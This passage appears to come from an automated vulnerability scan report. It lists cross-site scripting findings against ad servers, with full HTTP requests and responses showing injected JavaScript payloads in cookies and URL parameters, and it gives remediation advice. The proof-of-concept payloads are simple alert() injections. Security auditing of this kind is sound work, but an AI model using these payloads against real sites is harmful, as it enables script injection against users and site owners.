GET /bar/v16-401/c5/jsc/fm.js?c=101&a=0&f=&n=1220&r=13&d=9&q=&$=&s=69&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&z=0.11480318708345294 HTTP/1.1 Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~0104116b470"-alert(1)-"e08a3e6143; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365
Response (redirected)
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFad=0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "86257539-809a-4988a5ada3000" Vary: Accept-Encoding X-Varnish: 1882667040 1882666656 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=39 Expires: Fri, 28 Jan 2011 16:42:00 GMT Date: Fri, 28 Jan 2011 16:41:21 GMT Connection: close Content-Length: 1953
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=69;var zzPat='';var zzCu ...[SNIP]... m();}
var zzStr = "s=69;u=INmz6woBADYAAHrQ5V4AAACH~0104116b470"-alert(1)-"e08a3e6143;z=" + Math.random(); var ainfo = "";
var zzDate = new Date(); var zzWindow; var zzURL; if (typeof zzCustom =='undefined'){var zzIdxCustom ='';} else{var zzIdxCustom = zzCustom;} if (typeof zzTrd ...[SNIP]...
The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1c31"-alert(1)-"9a8564b65f6 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var zzStr = "s=126;u=INmz6woBADYAAHrQ5V4AAACH~010411e1c31"-alert(1)-"9a8564b65f6;z=" + Math.random(); var ainfo = "";
var zzDate = new Date(); var zzWindow; var zzURL; if (typeof zzCustom =='undefined'){var zzIdxCustom ='';} else{var zzIdxCustom = zzCustom;} if (typeof zzTrd ...[SNIP]...
The value of the FFpb cookie is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 91742(a)29b2b8ea683 was submitted in the FFpb cookie. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fmr.js HTTP/1.1 Host: c7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFcat=1220,101,9; ZFFAbh=749B826,20|1483_758#365; FFpb=1220:4f791'91742(a)29b2b8ea683; FFad=0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; __qca=P0-2130372027-1295906131971;
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 1017 Content-Type: application/x-javascript Set-Cookie: FFpb=1220:4f791'91742(a)29b2b8ea683;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=0,0,0:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "86257539-809a-4988a5ada3000" X-Varnish: 1882667040 1882666656 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=251 Expires: Fri, 28 Jan 2011 17:30:57 GMT Date: Fri, 28 Jan 2011 17:26:46 GMT Connection: close
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=0;var zzPat='None,4f791'91742(a)29b2b8ea683';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=None,4f791'91742(a)29b2b8ea683;z="+Math.random();}
The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74c5d"-alert(1)-"8b3d70f9a46 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var zzStr = "s=69;u=INmz6woBADYAAHrQ5V4AAACH~01041174c5d"-alert(1)-"8b3d70f9a46;z=" + Math.random(); var ainfo = "";
var zzDate = new Date(); var zzWindow; var zzURL; if (typeof zzCustom =='undefined'){var zzIdxCustom ='';} else{var zzIdxCustom = zzCustom;} if (typeof zzTrd ...[SNIP]...
The value of the FFpb cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 646ab"-alert(1)-"3ae61a116c4 was submitted in the FFpb cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1220:4f791'$951:spectrum300x250,ibnetwork300x250646ab"-alert(1)-"3ae61a116c4;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=826,187,9:951,2,9:951,7,9:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=4:2:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294,2#776116#653213#562813|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:0,27,2:0,26,1;expires=Mon, 28 Feb 2011 02:02:42 GMT;path=/;domain=.zedo.com; ETag: "19b436a-82a5-4989a5927aac0" Vary: Accept-Encoding X-Varnish: 2233582065 2233582057 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=114 Expires: Sat, 29 Jan 2011 02:04:36 GMT Date: Sat, 29 Jan 2011 02:02:42 GMT Connection: close Content-Length: 2517
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=2;var zzPat='spectrum300x250,ibnetwork300x250646ab"-alert(1)-"3ae61a116c4';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=spectrum300x250,ibnetwork300x250646ab"-alert(1)-"3ae61a116c4;z="+Math.random();}
The value of the FFpb cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 390b7'-alert(1)-'191f222b511 was submitted in the FFpb cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1220:4f791'$951:spectrum300x250,ibnetwork300x250390b7'-alert(1)-'191f222b511;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=826,187,9:951,2,9:951,7,9:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=4:2:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294,2#776116#653213#562813|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:0,27,2:0,26,1;expires=Mon, 28 Feb 2011 02:02:49 GMT;path=/;domain=.zedo.com; ETag: "19b436a-82a5-4989a5927aac0" Vary: Accept-Encoding X-Varnish: 2233582065 2233582057 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=107 Expires: Sat, 29 Jan 2011 02:04:36 GMT Date: Sat, 29 Jan 2011 02:02:49 GMT Connection: close Content-Length: 2517
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=2;var zzPat='spectrum300x250,ibnetwork300x250390b7'-alert(1)-'191f222b511';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=spectrum300x250,ibnetwork300x250390b7'-alert(1)-'191f222b511;z="+Math.random();}
The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae9a4"-alert(1)-"4d1fa70ea4e was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1;expires=Mon, 28 Feb 2011 02:00:39 GMT;path=/;domain=.zedo.com; Set-Cookie: FFcat=826,187,9:951,7,9:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "19b436a-82a5-4989a5927aac0" Vary: Accept-Encoding X-Varnish: 2233582065 2233582057 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=162 Expires: Sat, 29 Jan 2011 02:03:21 GMT Date: Sat, 29 Jan 2011 02:00:39 GMT Connection: close Content-Length: 2280
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=2;var zzPat='';var zzCusto ...[SNIP]...
var zzStr = "s=2;u=INmz6woBADYAAHrQ5V4AAACH~010411ae9a4"-alert(1)-"4d1fa70ea4e;z=" + Math.random(); var ainfo = "";
var zzDate = new Date(); var zzWindow; var zzURL; if (typeof zzCustom =='undefined'){var zzIdxCustom ='';} else{var zzIdxCustom = zzCustom;} if (typeof zzTrd ...[SNIP]...
The value of the V cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22348'%3balert(1)//7865b00c16b was submitted in the V cookie. This input was echoed as 22348';alert(1)//7865b00c16b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /TAGPUBLISH/getad.aspx?tagver=1&cd=1&if=0&ca=VIEWAD&cp=513102&ct=50151&cf=300X250&cn=1&rq=1&fldc=5&dw=1036&cwu=http%3A%2F%2Fevents.cbs6albany.com%2F%3F376e5%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253Ea7771aeaee3%3D1&mrnd=63109582 HTTP/1.1 Host: tag.contextweb.com Proxy-Connection: keep-alive Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj22348'%3balert(1)//7865b00c16b; cwbh1=2709%3B02%2F23%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9; cw=cw
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" CW-Server: CW-WEB30 Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: application/x-javascript; charset=utf-8 Content-Length: 2123 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Date: Sat, 29 Jan 2011 01:39:50 GMT Connection: close Set-Cookie: V=gFEcJzqCjXJj22348'%3balert(1)//7865b00c16b; domain=.contextweb.com; expires=Sun, 29-Jan-2012 01:39:51 GMT; path=/ Set-Cookie: 513102_300X250_50151=1/28/2011 8:39:51 PM; domain=.contextweb.com; path=/ Set-Cookie: vf=1; domain=.contextweb.com; expires=Sat, 29-Jan-2011 05:00:00 GMT; path=/
The value of the cwbh1 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1626'-alert(1)-'2bc9ddafdc1 was submitted in the cwbh1 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /TAGPUBLISH/getad.aspx?tagver=1&cd=1&if=0&ca=VIEWAD&cp=513102&ct=50151&cf=300X250&cn=1&rq=1&fldc=5&dw=1036&cwu=http%3A%2F%2Fevents.cbs6albany.com%2F%3F376e5%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253Ea7771aeaee3%3D1&mrnd=63109582 HTTP/1.1 Host: tag.contextweb.com Proxy-Connection: keep-alive Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B02%2F23%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9e1626'-alert(1)-'2bc9ddafdc1; cw=cw
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" X-Powered-By: ASP.NET CW-Server: CW-WEB22 Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: application/x-javascript; charset=utf-8 Content-Length: 2187 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Date: Sat, 29 Jan 2011 01:39:52 GMT Connection: close Set-Cookie: V=gFEcJzqCjXJj; domain=.contextweb.com; expires=Sun, 29-Jan-2012 01:39:52 GMT; path=/ Set-Cookie: 513102_300X250_50151=1/28/2011 8:39:52 PM; domain=.contextweb.com; path=/ Set-Cookie: vf=1; domain=.contextweb.com; expires=Sat, 29-Jan-2011 05:00:00 GMT; path=/
The value of the a request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6efd3"style%3d"x%3aexpression(alert(1))"d0649ea4848 was submitted in the a parameter. This input was echoed as 6efd3"style="x:expression(alert(1))"d0649ea4848 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ads2/c?a=853584;x=2304;g=172;c=1220000101,1220000101;i=0;n=1220;1=8;2=1;s=69;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=990638;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/6efd3"style%3d"x%3aexpression(alert(1))"d0649ea4848 HTTP/1.1 Host: xads.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Fri, 28 Jan 2011 15:06:34 GMT Server: ZEDO 3G Set-Cookie: FFgeo=5386156; path=/; EXPIRES=Sat, 28-Jan-12 15:06:34 GMT; DOMAIN=.zedo.com Set-Cookie: ZFFbh=826-20110128,20|305_1;expires=Sat, 28 Jan 2012 15:06:34 GMT;DOMAIN=.zedo.com;path=/; Set-Cookie: PCA922865=a853584Zc1220000101%2C1220000101Zs69Zi0Zt128; path=/; EXPIRES=Sun, 27-Feb-11 15:06:34 GMT; DOMAIN=.zedo.com P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Location: http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/6efd3"style="x:expression(alert(1))"d0649ea4848 Vary: Accept-Encoding Content-Length: 449 Connection: close Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/6efd3"style="x:expression(alert(1))"d0649ea4848"> ...[SNIP]...
4.1047. http://xads.zedo.com/ads2/c [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://xads.zedo.com
Path:
/ads2/c
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98a1b"style%3d"x%3aexpression(alert(1))"1924c3dd077 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 98a1b"style="x:expression(alert(1))"1924c3dd077 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ads2/c?a=853584;x=2304;g=172;c=1220000101,1220000101;i=0;n=1220;1=8;2=1;s=69;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=990638;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&98a1b"style%3d"x%3aexpression(alert(1))"1924c3dd077=1 HTTP/1.1 Host: xads.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Fri, 28 Jan 2011 15:06:36 GMT Server: ZEDO 3G Set-Cookie: FFgeo=5386156; path=/; EXPIRES=Sat, 28-Jan-12 15:06:36 GMT; DOMAIN=.zedo.com Set-Cookie: ZFFbh=826-20110128,20|305_1;expires=Sat, 28 Jan 2012 15:06:36 GMT;DOMAIN=.zedo.com;path=/; Set-Cookie: PCA922865=a853584Zc1220000101%2C1220000101Zs69Zi0Zt128; path=/; EXPIRES=Sun, 27-Feb-11 15:06:36 GMT; DOMAIN=.zedo.com P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Location: http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&98a1b"style="x:expression(alert(1))"1924c3dd077=1 Vary: Accept-Encoding Content-Length: 456 Connection: close Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&98a1b"style="x:expression(alert(1))"1924c3dd077=1"> ...[SNIP]...
5. Flash cross-domain policypreviousnext There are 2 instances of this issue:
The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.
